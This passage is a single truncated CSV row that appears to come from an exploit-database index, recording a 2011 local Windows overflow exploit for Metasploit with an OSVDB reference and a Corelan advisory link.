Overflow (Metasploit)",2011-04-30,Metasploit,local,windows,,2011-04-30,2011-04-30,1,OSVDB-72101,"Metasploit Framework (MSF)",,,,http://www.corelan.be/advisories.php?id=CORELAN-11-004